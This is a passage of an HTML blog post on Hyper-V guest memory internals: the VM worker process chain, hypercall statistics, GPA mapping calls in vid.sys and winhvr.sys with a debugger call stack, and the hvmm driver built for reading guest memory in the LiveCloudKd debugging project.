<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Working on the adaptation of LiveCloudKd helped me understand Hyper-V guest memory internals better. Soon Matt shared the sources on GitHub (</span><a href="https://github.com/comaeio/LiveCloudKd" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/comaeio/LiveCloudKd</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In 2017, Andrea Allievi gave a presentation on the Hyper-V memory management architecture (</span><a href="http://www.andrea-allievi.com/files/Recon_2017_Montreal_HyperV_public.pptx" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">www.andrea-allievi.com/files/Recon_2017_Montreal_HyperV_public.pptx</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">). Good work, but the details were described quite abstractly, and it was hard to match the information from the presentation to the real vid.sys code. I believe that was because, at the time of the presentation, Hyper-V symbol information had not yet been published. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Btw, thanks to Andrea for pointing me to the names of some vid.sys structures.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Additionally, I have to thank Microsoft, which decided to publish symbols for many Hyper-V modules (</span><a href="https://docs.microsoft.com/en-us/virtualization/community/team-blog/2018/20180425-hyper-v-symbols-for-debugging" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://docs.microsoft.com/en-us/virtualization/community/team-blog/2018/20180425-hyper-v-symbols-for-debugging</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">). Without them it would have been hard to analyze the memory management functions of vid.sys.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At first I planned to write an article about Hyper-V containers, but my research log exceeded 150 pages (6 from 9 font) and I still did not understand the whole working scheme. After that I decided to make a list of Hyper-V container components (which was then extended to a cheat sheet of all Hyper-V components; not many files needed to be added, since containers and Hyper-V have a very similar component base).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 661px; overflow: hidden; width: 551px;"><img height="661" src="https://lh5.googleusercontent.com/5Dw1dIiDIcbjrZgE7f2V-19wyrd5Jk2c9SbYJfLT7Qjylty9oKkOrW4ak6uNzw6sIs4IefiYC97oaLr-vdpI3X7EcLBVJORixbhxuoO9QTTwZ0v0c3wJEmnTFkezTGMtfxFHWV4" style="margin-left: 0px; margin-top: 0px;" width="551" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After that, I understood that it has too many components and is too big to describe in one article. Therefore, I decided to highlight the more interesting things in a separate article about guest OS memory structures.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Why guest OS only? The Hyper-V kernel, hvix64.exe, already has its memory handling described in the TLFS docs, and de facto it is involved in memory operations only at the allocation/deallocation stage. Guest OS memory reads and writes are performed independently of the hypervisor. Yes, of course the hypervisor sets memory access attributes and isolates guest OS memory from the root OS and from other guests, but that is done by hardware features like EPT and does not require involving the hypervisor in every memory read or write operation.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I describe memory access for Full VMs, WDAG, Windows Sandbox and, briefly, Docker containers. During the research the hvmm driver was created. Its main function is to provide an interface for reading guest OS memory from the root OS without going through the vid.sys or hvix64.exe API. That driver was integrated into the LiveCloudKd project.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A detailed description of Hyper-V internals will appear in Part 2 of the Windows Internals book, 7</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="font-size: 0.6em; vertical-align: super;">th</span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> edition, written by Andrea Allievi. But while the book is under development, you can read a short description of Hyper-V guest OS memory structures in this article :)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let’s begin. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Direct memory access to Full VM and Hyper-V containers</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Vmwp.exe is the main process that controls guest OS execution and provides device emulation. It is launched by vmcompute.exe, which is managed by vmms.exe for a Full VM, hvsimgr.exe for WDAG, WindowsSandbox.exe for Windows Sandbox, and docker.exe for Docker containers. When starting, the vmwp.exe process accesses the hypervisor interfaces (hypercalls) through the vid.dll interface. I collected hypercall usage statistics for a Windows Server 2019 VM, a Docker container in Hyper-V isolation mode (nanoserver image: 1809) and a WDAG container. The WDAG container generates too many hypercalls, so because of the delays caused by the debugger writing results, the container started to shut down immediately after being turned on (the WDAG management application hvsimgr.exe enforces execution timeouts on some procedures); therefore the WDAG results contain only a summary indicator (I want to try dtrace, relatively recently ported to Windows, to collect such statistics: in theory, it should reduce the cost of recording the collected data and avoid the hvsimgr.exe timeout limitations). Shutdown statistics are recorded separately, so that the approximate order can be estimated. 
Compared to a Full VM, it is quite large:</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 786px; overflow: hidden; width: 624px;"><img height="786" src="https://lh3.googleusercontent.com/ozosG1Lh1eyCXUEzOmNuVa-iG5CU5NEmzta2Nun_SsJKLQoWkAzRRlQ5Us-Dp2YZ58oRI45rfsZxpy3ZRuAygWeGzRpBnP-Po5bi4Rj-Dy3fEYr65wbPltnmioay0xWnsLRRX_c" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">What categories of hypercalls can be distinguished from these call statistics? Partition creation, configuring its properties, creating virtual processors and virtual ports (used to send signals and messages), setting up intercepts, and various hypercalls for memory management.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Look at the winhvr.sys!WinHvMapGpaPagesFromMbpArrayScanLargePages function. rdx contains the page number, rsi the size (in pages).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When we start a Windows Server 2019 VM with 1500 MB of RAM, we get:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1st call rdx=0000000000000000 rsi=000000000005dc00 </span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2nd call rdx=00000000000f8000 rsi=0000000000000800 </span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3rd call rdx=0000000000fff800 rsi=0000000000000800</span></div>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When we start a Windows Server 2019 VM with 2300 MB of RAM, we get:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1st call: rdx=0000000000000000 rsi=000000000008fc00 </span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2nd call: rdx=00000000000f8000 rsi=0000000000000800 </span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3rd call: rdx=0000000000fff800 rsi=000000000000024a</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call stack:</span></div>
<div align="left" dir="ltr" style="margin-left: -5.4pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="283"></col><col width="283"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1st call</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2nd and 3rd calls</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 winhvr!WinHvMapGpaPagesFromMbpArrayScanLargePages</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 Vid!VsmmHvpMapGpasFromMbpArray</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Vid!VsmmHvpMapGpasFromMemoryBlockRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 Vid!VsmmHvMapGpasFromMemoryBlock</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 Vid!VsmmAdjustGpaSpaceForMemoryBlockRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 Vid!VsmmCreateMemoryBlockGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 Vid!VidIoControlPartition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 Vid!VidIoControlDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 Vid!VidIoControlPreProcess</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.............WDF Calls............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0d nt!IofCallDriver</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0e nt!IopSynchronousServiceTail</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0f nt!IopXxxControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10 nt!NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">11 nt!KiSystemServiceCopyEnd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">12 ntdll!NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">13 vid_7ffb4de20000!VidCreateMemoryBlockGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14 vmwp!GpaRangeMbBacked::Initialize</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">15 vmwp!MemoryManager::CreateGpaRangeInternal</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">16 vmwp!MemoryManager::CreateMemoryBlock</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17 vmwp!MemoryManager::CreateRamMemoryBlocks</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18 </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmwp!MemoryManager::CreateRam</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19 vmwp!VirtualMachine::ConstructGuestRam</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a vmwp!WorkerTaskStarting::RunCleanStartSteps</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b vmwp!WorkerTaskStarting::RunTask</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1c vmwp!WorkerAsyncTask<VmPerf::Vmwp::StartingTask>::Execute</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d vmwp!VirtualMachine::DoStateChangeTask</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1e vmwp!VirtualMachine::StartInternal</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 winhvr!WinHvMapGpaPagesFromMbpArrayScanLargePages</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 Vid!VsmmHvpMapGpasFromMbpArray</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Vid!VsmmHvpMapGpasFromMemoryBlockRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 Vid!VsmmHvMapGpasFromMemoryBlock</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 Vid!VsmmAdjustGpaSpaceForMemoryBlockRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 Vid!VsmmCreateMemoryBlockGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 Vid!VidIoControlPartition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 Vid!VidIoControlDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 Vid!VidIoControlPreProcess</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.............WDF Calls............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0d nt!IofCallDriver</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0e nt!IopSynchronousServiceTail</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0f nt!IopXxxControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
